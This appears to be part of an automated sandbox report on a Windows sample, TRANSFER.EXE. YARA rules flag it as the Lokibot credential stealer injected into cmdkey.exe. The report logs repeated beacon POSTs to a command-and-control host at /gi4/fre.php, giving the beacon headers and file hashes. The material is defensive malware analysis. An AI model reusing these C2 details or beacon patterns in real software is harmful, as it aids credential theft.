                24192.168.2.64982045.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:55.767752886 CEST10715OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:56.944314003 CEST10721INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:46 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                25192.168.2.64982345.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:58.081187963 CEST10759OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:59.337044001 CEST10843INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:48 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                26192.168.2.64983245.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:00.816507101 CEST10937OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:02.125452042 CEST11177INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:51 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                27192.168.2.64984645.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:03.190476894 CEST11194OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:04.472523928 CEST11366INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:53 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                28192.168.2.64986045.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:05.554361105 CEST11418OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:06.810702085 CEST11520INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:55 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                29192.168.2.64986945.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:11.819483042 CEST11682OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:13.145529032 CEST11771INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:12:02 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.64977045.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:43.512598991 CEST955OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:44.657387018 CEST956INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:33 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                30192.168.2.64987645.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:15.818316936 CEST12025OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:16.875250101 CEST12112INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:12:06 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                31192.168.2.64988045.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:19.118778944 CEST12113OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:20.337044001 CEST12114INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:12:09 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                32192.168.2.64988145.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:22.599824905 CEST12115OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:23.851052046 CEST12115INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:12:12 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                33192.168.2.64988345.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:12:25.116712093 CEST12123OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:12:26.294070959 CEST12123INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:12:15 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.64977145.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:46.236810923 CEST957OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:47.482676029 CEST958INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:36 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.2.64977245.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:49.248779058 CEST958OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:50.403893948 CEST959INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:39 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.2.64977345.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:51.481983900 CEST960OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:52.735646009 CEST960INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:41 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.2.64977445.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:53.861085892 CEST961OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:55.059781075 CEST962INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:44 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.2.64977545.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:56.189285040 CEST963OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:57.419936895 CEST1001INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:46 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.2.64978745.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:58.658888102 CEST1136OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:59.837244034 CEST1136INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:48 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Click to jump to process

                Target ID:0
                Start time:09:10:19
                Start date:05/08/2022
                Path:C:\Users\user\Desktop\TRANSFER.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\TRANSFER.EXE"
                Imagebase:0x6a0000
                File size:1517568 bytes
                MD5 hash:6153ED96A83CEEA98DBAE09E7B77FCF6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409970337.0000000003C25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409728288.0000000003BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409614394.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409458499.0000000003B1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409879608.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.409509692.0000000003B53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low

                Target ID:1
                Start time:09:10:28
                Start date:05/08/2022
                Path:C:\Windows\SysWOW64\cmdkey.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\cmdkey.exe
                Imagebase:0x290000
                File size:17408 bytes
                MD5 hash:621B275C5DDBF13327E6A94222EDD433
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
